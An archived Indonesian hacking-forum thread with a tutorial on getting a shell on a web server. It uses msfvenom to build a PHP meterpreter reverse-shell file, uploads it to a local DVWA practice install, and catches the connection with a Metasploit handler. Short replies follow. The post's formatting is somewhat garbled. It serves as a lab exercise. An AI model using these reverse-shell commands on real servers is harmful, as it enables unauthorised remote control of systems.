+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html)
+--- Forum: Exploitation (https://www.indonesianbacktrack.or.id/forum/forum-43.html)
+---- Forum: Metasploit (https://www.indonesianbacktrack.or.id/forum/forum-122.html)
+---- Thread: Rooting Web Server Kali LInux Menggunakan Metasploit (/thread-4843.html)
Rooting Web Server Kali LInux Menggunakan Metasploit - m4k4ss4rh4ck3r - 07-27-2013
Selamat Melaksanakan Ibadah puasa bagi teman-teman pencinta IT indonesia dan sahabat-sahabat saya di
indonesian backtrack team,codernate,dan IT-Manado/Indifinetech.....!!!
Penulis kali ini akan memberikan sedikit ilmu rooting webserver kali linux dengan memanfaatkan metasploit
untuk membuat shell php,disini penulis sengaja menggunkan web yang sudah vulnerability DVWA (Damn
Vulnerable Web Application) dan web application ini bisa didownload di http://www.dvwa.co.uk/
Kita buat dulu php sheelnya
LHOST= IP komputer anda
Lport= port target
Desktop/premankali.php = sheelnya bernama premankali.php terletak di Desktop.
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.114.177.215 LPORT=81 -f raw >
Desktop/premankali.php
Edit premankali.php dengan text editor kesayangan anda disini penulis menggunakan leafpad lebih ringan dan
cepat,penulis juga sudah mencoba menggunakan gedit tapi responnya lama banget...so gedit is't recommended.
Tambahkan tag pembuka dan penutup php di awal script dan akhir script
?>
karena default saat kita membuat php sheel tidak terdapat tag pembuka dan penutupnya.
Jalankan localhosnya ->Application-->Kali Linux-->System Service-->HTTP-->apache2 start
mysql Application-->Kali Linux-->System Service-->HTTP-->Mysql start
Buka Web Application DVWA di browser 127.0.0.1/dvwa
Username = admin
Password = password
Setup create database
upload premankali.php
premankali.php masuk ke dir dvwa/hackable/uploads
![[Image: kali2.2.3.png]](https://3.bp.blogspot.com/-5CBwQZNACfk/UfPejC-O8KI/AAAAAAAABoI/66vis-3Hb8o/s1600/kali2.2.3.png)
Sekarang kita komunikasikan premankali.php dengan metasploit
msfcli exploit/multi/handler LHOST=10.114.177.215 LPORT=81 PAYLOAD=php/meterpreter_reverse_tcp E
ketika premankali.php dieksekusi target maka dengan otomatis membuka meterpreter
![[Image: kali3.png]](https://4.bp.blogspot.com/-m49m40OHvVk/UfPezCRZ1YI/AAAAAAAABoQ/kkYTM2FN_o4/s1600/kali3.png)
RE: Rooting Web Server Kali LInux Menggunakan Metasploit - gnome_selpa - 07-28-2013
Nice Post mas bro..
keep smile
RE: Rooting Web Server Kali LInux Menggunakan Metasploit - faizul amali - 07-28-2013
nice tutor bro
izin cicipi dulu ilmunya
RE: Rooting Web Server Kali LInux Menggunakan Metasploit - alkaaf - 07-28-2013
hehe copas yah om? tolong dirapi in
tuh kan rootingnya memanfaatkan dvwa yang memang vulnerable. kalo tanpa dvwa gmn om?
RE: Rooting Web Server Kali LInux Menggunakan Metasploit - ekawithoutyou - 07-28-2013
Bisa dikasih Sourcenya dari mana ga om
kalo itu memang copas dari situs lain
RE: Rooting Web Server Kali LInux Menggunakan Metasploit - alkaaf - 07-28-2013
(07-28-2013, 11:13 AM)ekawithoutyou Wrote: Bisa dikasih Sourcenya dari mana ga om
copas dr pdf om makanya dikit berantakan.
. pdfnya om makassarhacker sndiri kok
RE: Rooting Web Server Kali LInux Menggunakan Metasploit - green_word - 07-28-2013
Buat cari celah di win 8 , or cari bug nya bisa enggak ya
RE: Rooting Web Server Kali LInux Menggunakan Metasploit - Clound_Carbelius - 07-28-2013
Nyimax dulu dah ane...
izin gelar tiger